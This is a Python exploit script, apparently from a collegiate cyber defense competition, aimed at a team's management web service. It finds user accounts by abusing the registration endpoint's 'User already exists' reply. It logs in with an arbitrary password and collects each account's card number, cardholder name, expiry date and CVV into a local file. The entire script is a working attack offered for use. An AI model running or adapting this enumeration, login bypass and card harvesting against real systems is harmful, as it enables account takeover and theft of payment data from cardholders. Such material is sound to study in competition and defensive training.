import requests

TEAM_NUMBER = input("Enter team number being targeted: ")
#BASE_URL = "http://localhost:5001"
BASE_URL = "http://mgmt.team{TEAM_NUMBER}.isucdc.com:5000"
HEADERS = { "User-Agent": "python-requests/2.6.67; Francis Bourgeois Fan #73962" }

POTENTIAL_USERS = [
    "admin", "Administrator", "cdc", "blue_flag", "test", 
    "john.doe", "jane.smith", "guest", "root", "user",
    "transit-admin", "ticket-admin", "operator"
]

def check_user_exists(username):
    payload = {"username": username, "password": "password123"}
    response = requests.post(f"{BASE_URL}/auth/register", json=payload, headers=HEADERS)
    if response.status_code == 400 and b"User already exists" in response.content:
        return True
    return False

def get_payment_info(username):
    session = requests.Session()
    session.headers.update(HEADERS)
    login_payload = {"username": username, "password": "any"}
    session.post(f"{BASE_URL}/auth/login", json=login_payload)
    response = session.get(f"{BASE_URL}/payment-info/")
    if response.status_code == 200:
        try:
            return response.json()
        except:
            return None
    return None

def run_exploit():
    output_file = "harvested_payments.txt"
    with open(output_file, "w") as f:
        def log(msg):
            print(msg)
            f.write(msg + "\n")
        log("[*] Exploit: Mass Payment Information Harvest")
        log(f"[*] Enumerating and harvesting data for known/common users...")
        log(f"[*] Results will be saved to: {output_file}\n")
        found_any = False
        for user in POTENTIAL_USERS:
            if check_user_exists(user):
                log(f"[+] Found existing user: {user}")
                info = get_payment_info(user)
                if info:
                    log(f"    - Card: {info.get('card_number')}")
                    log(f"    - Holder: {info.get('cardholder_name')}")
                    log(f"    - Expiry: {info.get('expiry_date')}")
                    log(f"    - CVV: {info.get('cvv')}")
                else:
                    log("    - No payment info found.")
                found_any = True
                log("-" * 40)
        if not found_any:
            log("[-] No users from the target list were found.")

if __name__ == "__main__":
    run_exploit()
